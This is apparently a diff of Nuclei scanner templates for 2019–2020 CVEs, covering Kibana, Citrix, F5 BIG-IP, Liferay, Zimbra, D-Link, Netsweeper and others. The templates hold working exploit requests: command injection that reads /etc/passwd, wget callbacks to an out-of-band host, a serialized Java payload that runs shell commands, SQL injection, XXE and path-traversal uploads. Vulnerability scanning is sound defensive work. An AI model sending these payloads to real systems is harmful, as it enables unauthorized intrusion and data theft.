         {"Type":"SubscriptionConfirmation","Message":"","SubscribeURL":"https://rfi.nessus.org/rfi.txt"}
 

cves/2019/CVE-2019-7256.yaml

@@ -11,31 +11,21 @@ info:
   tags: cve,cve2019,emerge,rce
 
 requests:
-  - raw: # Default Port
+  - raw:
       - |
         GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20nuclei.txt%60 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        DNT: 1
-        Connection: close
-        Upgrade-Insecure-Requests: 1
       - |
         GET /nuclei.txt HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        DNT: 1
-        Connection: close
-        Upgrade-Insecure-Requests: 1
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: regex
         regex:
           - "root:.*:0:0:"

cves/2019/CVE-2019-7609.yaml

@@ -10,31 +10,27 @@ info:
     - https://discuss.elastic.co/t/elastic-stack-6-6-1-and-5-6-15-security-update/169077
   tags: cve,cve2019,kibana,rce
 
-  # Kibana versions before 5.6.15 and 6.6.1
-  # contain an arbitrary code execution flaw in the Timelion visualizer.
-  # An attacker with access to the Timelion application could send a request
-  # that will attempt to execute javascript code.
-  # This could possibly lead to an attacker executing arbitrary commands
-  # with permissions of the Kibana process on the host system.
-
 requests:
   - method: POST
     path:
       - "{{BaseURL}}/api/timelion/run"
     headers:
-      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55"
       Content-Type: "application/json; charset=utf-8"
-    body: "{\"sheet\":[\".es(*)\"],\"time\":{\"from\":\"now-1m\",\"to\":\"now\",\"mode\":\"quick\",\"interval\":\"auto\",\"timezone\":\"Asia/Shanghai\"}}"
+
+    body: '{"sheet":[".es(*)"],"time":{"from":"now-1m","to":"now","mode":"quick","interval":"auto","timezone":"Asia/Shanghai"}}'
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "seriesList"
         part: body
+
       - type: word
         words:
-          - "Content-Type: application/json"
+          - "application/json"
         part: header
+
       - type: status
         status:
           - 200

cves/2019/CVE-2019-9670.yaml

@@ -12,7 +12,6 @@ requests:
       - |
         POST /Autodiscover/Autodiscover.xml HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Content-Type: application/xml
 
         <!DOCTYPE xxe [

cves/2019/CVE-2019-9733.yaml

@@ -1,4 +1,5 @@
 id: CVE-2019-9733
+
 info:
   name: Artifactory Access-Admin Login Bypass
   author: akshansh
@@ -15,18 +16,13 @@ requests:
       - |
         POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 60
         Accept: application/json, text/plain, */*
         X-Requested-With: artUI
-        serial: 58
         X-Forwarded-For: 127.0.0.1
         Request-Agent: artifactoryUI
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36
         Content-Type: application/json
-        Origin: http://{{Hostname}}
+        Origin: {{BaseURL}}
-        Referer: http://{{Hostname}}/artifactory/webapp/
+        Referer: {{BaseURL}}/artifactory/webapp/
-        Accept-Language: en-US,en;q=0.9
-        Connection: close
 
         {"user":"access-admin","password":"password","type":"login"}
 

cves/2020/CVE-2020-11978.yaml

@@ -15,24 +15,17 @@ requests:
       - |
         GET /api/experimental/test HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        Accept-Encoding: gzip, deflate
         Accept: */*
 
       - |
         GET /api/experimental/dags/example_trigger_target_dag/paused/false HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        Accept-Encoding: gzip, deflate
         Accept: */*
 
       - |
         POST /api/experimental/dags/example_trigger_target_dag/dag_runs HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        Accept-Encoding: gzip, deflate
         Accept: */*
-        Content-Length: 85
         Content-Type: application/json
 
         {"conf": {"message": "\"; touch test #"}}
@@ -40,8 +33,6 @@ requests:
       - |
         GET /api/experimental/dags/example_trigger_target_dag/dag_runs/{{exec_date}}/tasks/bash_task HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        Accept-Encoding: gzip, deflate
         Accept: */*
 
 

cves/2020/CVE-2020-12720.yaml

@@ -14,9 +14,6 @@ requests:
         POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1
         Host: {{Hostname}}
         Accept: */*
-        Connection: keep-alive
-        X-Requested-With: XMLHttpRequest
-        Content-Length: 218
         Content-Type: application/x-www-form-urlencoded
 
         nodeId%5Bnodeid%5D=1%20union%20select%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2CCONCAT%28%27vbulletin%27%2C%27rce%27%2C%40%40version%29%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27--+-

cves/2020/CVE-2020-13167.yaml

@@ -10,33 +10,22 @@ info:
     - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
     - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
 
-# This template exploits a Python code injection in the Netsweeper
-# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
-# prior, to execute code as the root user.
-
-# Authentication is bypassed by sending a random whitelisted Referer
-# header in each request.
-
-# Tested on the CentOS Linux-based Netsweeper 6.4.3 and 6.4.4 ISOs.
-# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
-# been confirmed exploitable.
-
 requests:
   - method: GET
     path:
-      # Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
+        # Hex payload: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
       - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
       - "{{BaseURL}}/webadmin/out"
     headers:
-      Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
+      Referer: "{{BaseURL}}/webadmin/admin/service_manager_data.php"
-      User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"
+
-      Connection: "close"
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "nonexistent"
         part: body
+
       - type: status
         status:
           - 200

cves/2020/CVE-2020-15568.yaml

@@ -13,13 +13,11 @@ requests:
       - |
         GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
         Content-Type: application/x-www-form-urlencoded
 
       - |
         GET /include/nuclei.txt HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
         Content-Type: application/x-www-form-urlencoded
 
     matchers-condition: and

cves/2020/CVE-2020-16139.yaml

@@ -14,7 +14,6 @@ requests:
       - |
         POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
 
     matchers-condition: and
     matchers:

cves/2020/CVE-2020-17505.yaml

@@ -13,16 +13,12 @@ requests:
       - |
         GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: */*
-        Connection: close
 
       - |
         GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: */*
-        Connection: close
 
     cookie-reuse: true
     matchers-condition: and
@@ -33,6 +29,7 @@ requests:
           - "Position: ||whoami||"
           - "root"
         condition: and
+
         part: body
       - type: status
         status:

cves/2020/CVE-2020-17518.yaml

@@ -16,9 +16,7 @@ requests:
         POST /jars/upload HTTP/1.1
         Host: {{Hostname}}
         Accept: */*
-        Accept-Language: en
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y
-        Content-Length: 187
 
         ------WebKitFormBoundaryoZ8meKnrrso89R6Y
         Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc"

cves/2020/CVE-2020-24186.yaml

@@ -14,25 +14,14 @@ requests:
         GET /?p=1 HTTP/1.1
         Host: {{Hostname}}
         Accept: */*
-        Connection: close
 
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 745
-        Accept: */*
         X-Requested-With: XMLHttpRequest
-        sec-ch-ua-mobile: ?0
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundary88AhjLimsDMHU1Ak
         Origin: {{BaseURL}}
-        Sec-Fetch-Site: same-origin
-        Sec-Fetch-Mode: cors
-        Sec-Fetch-Dest: empty
         Referer: {{BaseURL}}
-        Accept-Encoding: gzip, deflate
-        Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
-        Connection: close
 
         ------WebKitFormBoundary88AhjLimsDMHU1Ak
         Content-Disposition: form-data; name="action"

cves/2020/CVE-2020-24579.yaml

@@ -13,34 +13,21 @@ requests:
       - | # Response:Location: /page/login/login_fail.html
         POST / HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: id,en-US;q=0.7,en;q=0.3
-        DNT: 1
-        Connection: close
         Cookie: uid=6gPjT2ipmNz
-        Upgrade-Insecure-Requests: 1
-        Content-Length: 0
 
         username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
 
       - | # Get /etc/passwd
         GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: id,en-US;q=0.7,en;q=0.3
-        DNT: 1
-        Connection: close
         Cookie: uid=6gPjT2ipmNz
-        Upgrade-Insecure-Requests: 1
-        Content-Length: 0
 
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: regex
         regex:
           - "nobody:[x*]:65534:65534"

cves/2020/CVE-2020-25213.yaml

@@ -19,9 +19,7 @@ requests:
         POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1
         Host: {{Hostname}}
         Accept: */*
-        Content-Length: 608
         Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48
-        Connection: close
 
         --------------------------ca81ac1fececda48
         Content-Disposition: form-data; name="reqid"

cves/2020/CVE-2020-25506.yaml

@@ -15,18 +15,14 @@ requests:
       - |
         POST /cgi-bin/system_mgr.cgi? HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: */*
-        Connection: close
 
         C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}`
 
       - |
         POST /cgi-bin/system_mgr.cgi?C1=ON&cmd=cgi_ntp_time&f_ntp_server=`wget http://{{interactsh-url}}` HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: */*
-        Connection: close
 
     matchers:
       - type: word

cves/2020/CVE-2020-26919.yaml

@@ -15,9 +15,7 @@ requests:
       - |
         POST /login.htm HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
         Accept: */*
-        Connection: close
 
         submitId=debug&debugCmd=wget+http://{{interactsh-url}}&submitEnd=
 

cves/2020/CVE-2020-28188.yaml

@@ -16,17 +16,10 @@ requests:
       - |
         GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: keep-alive
 
+      - |
         GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Connection: keep-alive
 
     matchers:
       - type: word

cves/2020/CVE-2020-28208.yaml

@@ -14,10 +14,7 @@ requests:
         POST /api/v1/method.callAnon/sendForgotPasswordEmail HTTP/1.1
         Host: {{Hostname}}
         Origin: {{BaseURL}}
-        X-Requested-With: XMLHttpRequest
         Content-Type: application/json
-        User-Agent: Ophion SecurityGroup
-        Accept-Language: en-US,en;q=0.9
 
         {"message":"{\"msg\":\"method\",\"method\":\"sendForgotPasswordEmail\",\"params\":[\"user@local.email\"],\"id\":\"3\"}"}
 

cves/2020/CVE-2020-35713.yaml

@@ -13,12 +13,9 @@ requests:
       - |
         POST /goform/setSysAdm HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept-Encoding: gzip, deflate
         Accept: */*
-        Connection: keep-alive
+        Origin: {{BaseURL}}
-        Origin: http://{{Hostname}}
+        Referer: {{BaseURL}}/login.shtml
-        Referer: http://{{Hostname}}/login.shtml
 
         admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
 

cves/2020/CVE-2020-3580.yaml

@@ -17,7 +17,6 @@ requests:
         POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        Content-Length: 44
 
         SAMLResponse=%22%3E%3Csvg/onload=alert(/{{randstr}}/)%3E
 

cves/2020/CVE-2020-35951.yaml

@@ -14,30 +14,16 @@ requests:
       - |
         GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
-        Connection: close
 
       - |
         GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
-        Connection: close
 
       - |
         POST /wp-admin/admin-ajax.php HTTP/1.1
         Host: {{Hostname}}
-        Content-Length: 269
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.192 Safari/537.36
         Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
-        Accept: */*
+
-        Accept-Language: en-US,en;q=0.9
-        Connection: close
 
         ------WebKitFormBoundaryBJ17hSJBjuGrnW92
         Content-Disposition: form-data; name="action"
@@ -52,11 +38,6 @@ requests:
       - |
         GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
         Host: {{Hostname}}
-        Accept-Encoding: gzip, deflate
-        Accept: */*
-        Accept-Language: en
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
-        Connection: close
 
     extractors:
       - type: regex

cves/2020/CVE-2020-36112.yaml

@@ -15,14 +15,6 @@ requests:
       - |
         GET /ebook/bookPerPub.php?pubid=4' HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
-        DNT: 1
-        Connection: close
-        Cookie: PHPSESSID=c4qd3glr3oe6earuf88sub6g1n
-        Upgrade-Insecure-Requests: 1
 
     matchers:
       - type: word

cves/2020/CVE-2020-5307.yaml

@@ -15,8 +15,6 @@ requests:
         POST /dfsms/ HTTP/1.1
         Host: {{Hostname}}
         Content-Type: application/x-www-form-urlencoded
-        Connection: close
-        Content-Length: 66
 
         username=admin%27+or+%271%27+%3D+%271%27%3B+--+-&password=A&login=
 

cves/2020/CVE-2020-5902.yaml

@@ -26,11 +26,13 @@ requests:
       - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"
       - "{{BaseURL}}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license"
       - "{{BaseURL}}/hsqldb%0a"
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: regex
         regex:
           - "root:.*:0:0:"
@@ -38,41 +40,35 @@ requests:
           - "[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{5}-[a-fA-F]{7}"
           - "HSQL Database Engine Servlet"
         condition: or
-        part: body
+
   - raw:
       - |
         POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
         command=create%20cli%20alias%20private%20list%20command%20bash
       - |
         POST /tmui/locallb/workspace/fileSave.jsp HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
         fileName=%2Ftmp%2Fnonexistent&content=echo%20%27aDNsbDBfdzBSbGQK%27%20%7C%20base64%20-d
       - |
         POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
         command=list%20%2Ftmp%2Fnonexistent
       - |
         POST /tmui/locallb/workspace/tmshCmd.jsp HTTP/1.1
         Host: {{Hostname}}
-        Connection: close
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)
 
         command=delete%20cli%20alias%20private%20list
+
     matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
+
       - type: word
         words:
           - "h3ll0_w0Rld"

cves/2020/CVE-2020-7796.yaml

@@ -14,9 +14,6 @@ requests:
       - |
         GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://{{interactsh-url}}%23 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36
-        Accept-Encoding: gzip, deflate
-        Accept: */*
 
     matchers:
       - type: word

cves/2020/CVE-2020-7961.yaml

@@ -15,14 +15,8 @@ requests:
       - |
         POST /api/jsonws/invoke HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
-        Content-Length: 4938
-        Accept: */*
-        Accept-Language: en
-        Connection: close
         Content-Type: application/x-www-form-urlencoded
         Referer: {{BaseURL}}/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData
-        X-Requested-With: XMLHttpRequest
         cmd2: §command§
 
         cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D
@@ -39,8 +33,7 @@ requests:
         regex:
           - "OS Name:.*Microsoft Windows"
           - "Distributor ID:"
-        condition: or
+
-        part: body
       - type: status
         status:
           - 200

cves/2020/CVE-2020-8191.yaml

@@ -14,23 +14,18 @@ requests:
       - |
         POST /menu/stapp HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        DNT: 1
-        Connection: close
-        Upgrade-Insecure-Requests: 1
-        Content-Length: 96
         Content-Type: application/x-www-form-urlencoded
         X-NITRO-USER: xpyZxwy6
 
         sid=254&pe=1,2,3,4,5&appname=%0a</title><script>alert(31337)</script>&au=1&username=nsroot
+
     matchers-condition: and
     matchers:
       - type: word
         words:
           - "</title><script>alert(31337)</script>"
         part: body
+
       - type: status
         status:
           - 200

cves/2020/CVE-2020-8193.yaml

@@ -15,7 +15,6 @@ requests:
       - |
         POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
         Content-Type: application/xml
         X-NITRO-USER: xpyZxwy6
         X-NITRO-PASS: xWXHUJ56
@@ -25,30 +24,18 @@ requests:
       - |
         GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: python-requests/2.24.0
-        Accept: */*
-        Connection: close
 
       - |
         GET /menu/neo HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: python-requests/2.24.0
-        Accept: */*
-        Connection: close
 
       - |
         GET /menu/stc HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: python-requests/2.24.0
-        Accept: */*
-        Connection: close
 
       - |
         POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: python-requests/2.24.0
-        Accept: */*
-        Connection: close
         Content-Type: application/xml
         X-NITRO-USER: oY39DXzQ
         X-NITRO-PASS: ZuU9Y9c1
@@ -59,9 +46,6 @@ requests:
       - |
         POST /rapi/filedownload?filter=path:%2Fetc%2Fpasswd HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: python-requests/2.24.0
-        Accept: */*
-        Connection: close
         Content-Type: application/xml
         X-NITRO-USER: oY39DXzQ
         X-NITRO-PASS: ZuU9Y9c1
@@ -70,20 +54,14 @@ requests:
         <clipermission></clipermission>
 
     cookie-reuse: true
-
-    # Using cookie-reuse to maintain session between each request, same as browser.
-
     extractors:
       - type: regex
-        name: randkey
+        name: randkey # dynamic variable
         part: body
         internal: true
         regex:
           - "(?m)[0-9]{3,10}\\.[0-9]+"
 
-    # Using rand_key as dynamic variable to make use of extractors at run time.
-
-
     matchers:
       - type: regex
         regex:

cves/2020/CVE-2020-8194.yaml

@@ -5,23 +5,15 @@ info:
   author: dwisiswant0
   severity: high
   tags: cve,cve2020,citrix
-  description: |
